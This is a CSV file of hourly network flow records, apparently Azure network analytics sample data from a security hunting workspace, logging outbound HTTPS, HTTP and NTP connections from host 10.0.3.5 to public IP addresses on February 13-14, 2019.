+25,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.123,2019-02-13 21:09:10.000,2019-02-13 21:09:10.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+11,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:38.101,2019-02-13 21:09:44.000,2019-02-13 21:09:44.000,2019-02-13 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+21,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:52.654,2019-02-13 21:10:58.000,2019-02-13 21:53:11.000,2019-02-13 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.200', '204.79.197.200', '134.170.58.123']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,72.21.81.200,5.0
+22,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:52.654,2019-02-13 21:10:58.000,2019-02-13 21:53:11.000,2019-02-13 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.200', '204.79.197.200', '134.170.58.123']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,204.79.197.200,5.0
+23,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:52.654,2019-02-13 21:10:58.000,2019-02-13 21:53:11.000,2019-02-13 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.200', '204.79.197.200', '134.170.58.123']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,134.170.58.123,5.0
+20,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:38.960,2019-02-13 21:10:59.000,2019-02-13 21:11:04.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,2.0
+24,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:52.435,2019-02-13 21:11:03.000,2019-02-13 21:11:03.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+640,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:00:34.000,2019-02-13 22:59:09.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+641,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:00:34.000,2019-02-13 22:59:09.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+645,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:08:46.000,2019-02-13 22:53:49.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+644,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:08:46.000,2019-02-13 22:53:49.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+639,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:09:10.000,2019-02-13 22:09:10.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+649,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:13:52.000,2019-02-13 22:58:53.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+650,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:13:52.000,2019-02-13 22:58:53.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+646,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:14:36.000,2019-02-13 22:48:44.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+648,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:28:45.000,2019-02-13 22:28:45.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+643,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:28:49.000,2019-02-13 22:28:49.000,2019-02-13 23:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['216.58.218.238', '173.194.61.40']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,173.194.61.40,2.0
+642,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:28:49.000,2019-02-13 22:28:49.000,2019-02-13 23:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['216.58.218.238', '173.194.61.40']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,216.58.218.238,2.0
+647,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:28:49.000,2019-02-13 22:29:08.000,2019-02-13 23:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,172.217.15.99,2.0
+660,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:03:56.000,2019-02-13 23:55:24.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+661,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:03:56.000,2019-02-13 23:55:24.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+664,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.181,2019-02-13 23:05:48.000,2019-02-13 23:57:00.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+663,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:08:46.000,2019-02-13 23:53:50.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+662,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:08:46.000,2019-02-13 23:53:50.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+667,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.181,2019-02-13 23:08:50.000,2019-02-13 23:58:54.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,6.0
+666,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.181,2019-02-13 23:08:50.000,2019-02-13 23:58:54.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+665,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.181,2019-02-13 23:08:50.000,2019-02-13 23:58:54.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+659,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:09:10.000,2019-02-13 23:09:10.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+633,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:01:06.000,2019-02-14 00:59:12.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,21.0
+632,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:01:06.000,2019-02-14 00:59:12.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,21.0
+635,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:08:46.000,2019-02-14 00:38:50.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+634,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:08:46.000,2019-02-14 00:38:50.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+631,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:09:10.000,2019-02-14 00:09:10.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+637,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:13:54.000,2019-02-14 00:58:54.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+638,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:13:54.000,2019-02-14 00:58:54.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+636,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:14:04.000,2019-02-14 00:48:12.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+655,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:03:03.000,2019-02-14 01:03:03.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+652,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:03:47.000,2019-02-14 01:56:22.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,17.0
+653,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:03:47.000,2019-02-14 01:56:22.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,17.0
+656,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:05:16.000,2019-02-14 01:56:28.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+654,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:08:45.000,2019-02-14 01:58:45.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.65.107.32'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,3.0
+651,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:09:10.000,2019-02-14 01:09:10.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+658,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.636,2019-02-14 01:13:54.000,2019-02-14 01:58:55.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+657,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.636,2019-02-14 01:13:54.000,2019-02-14 01:58:55.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+6,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.515,2019-02-14 02:01:57.000,2019-02-14 02:58:16.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+7,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.515,2019-02-14 02:01:57.000,2019-02-14 02:58:16.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+8,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.547,2019-02-14 02:05:03.000,2019-02-14 02:58:55.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69', '65.55.44.108']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,7.0
+9,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.547,2019-02-14 02:05:03.000,2019-02-14 02:58:55.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69', '65.55.44.108']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,7.0
+10,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.547,2019-02-14 02:05:03.000,2019-02-14 02:58:55.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69', '65.55.44.108']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,7.0
+3,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:06.765,2019-02-14 02:08:46.000,2019-02-14 02:48:45.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+2,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:06.765,2019-02-14 02:08:46.000,2019-02-14 02:48:45.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+5,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.531,2019-02-14 02:09:10.000,2019-02-14 02:09:10.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+12,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:21.762,2019-02-14 02:13:32.000,2019-02-14 02:47:40.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+4,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:06.828,2019-02-14 02:30:56.000,2019-02-14 02:30:56.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+620,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 02:59:56.000,2019-02-14 03:54:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.91.29', '72.21.81.240']",,,T,http,80.0,O,3.0,0.0,0.0,0.0,,eastus,72.21.81.240,3.0
+619,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 02:59:56.000,2019-02-14 03:54:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.91.29', '72.21.81.240']",,,T,http,80.0,O,3.0,0.0,0.0,0.0,,eastus,72.21.91.29,3.0
+630,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:02.000,2019-02-14 03:58:56.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,9.0
+629,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:02.000,2019-02-14 03:58:56.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+628,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:43.000,2019-02-14 03:00:43.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.64.188.245'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westus,eastus,13.64.188.245,1.0
+625,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:43.000,2019-02-14 03:53:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.163.78', '172.217.15.99', '72.21.81.200']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,,eastus,65.55.163.78,4.0
+627,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:43.000,2019-02-14 03:53:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.163.78', '172.217.15.99', '72.21.81.200']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,,eastus,72.21.81.200,4.0
+626,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:43.000,2019-02-14 03:53:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.163.78', '172.217.15.99', '72.21.81.200']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,,eastus,172.217.15.99,4.0
+617,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:50.000,2019-02-14 03:58:47.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+618,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:50.000,2019-02-14 03:58:47.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+623,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:04:44.000,2019-02-14 03:55:56.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+621,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:08:46.000,2019-02-14 03:38:45.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.65.107.32'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,2.0
+616,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:09:10.000,2019-02-14 03:09:10.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+624,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:13:55.000,2019-02-14 03:34:15.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,3.0
+622,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:24:03.000,2019-02-14 03:24:03.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+590,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:01:16.000,2019-02-14 04:59:23.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,26.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,26.0
+589,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:01:16.000,2019-02-14 04:59:23.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,26.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,26.0
+593,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:08:46.000,2019-02-14 04:51:37.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,5.0
+594,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:08:46.000,2019-02-14 04:51:37.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,5.0
+585,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:09:10.000,2019-02-14 04:22:16.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.187.212', '13.86.124.191', '13.67.143.117']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,centralus,eastus,13.86.124.191,4.0
+586,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:09:10.000,2019-02-14 04:22:16.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.187.212', '13.86.124.191', '13.67.143.117']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,4.0
+584,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:09:10.000,2019-02-14 04:22:16.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.187.212', '13.86.124.191', '13.67.143.117']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,centralus,eastus,13.89.187.212,4.0
+605,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:12:46.000,2019-02-14 04:41:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '20.41.41.23', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
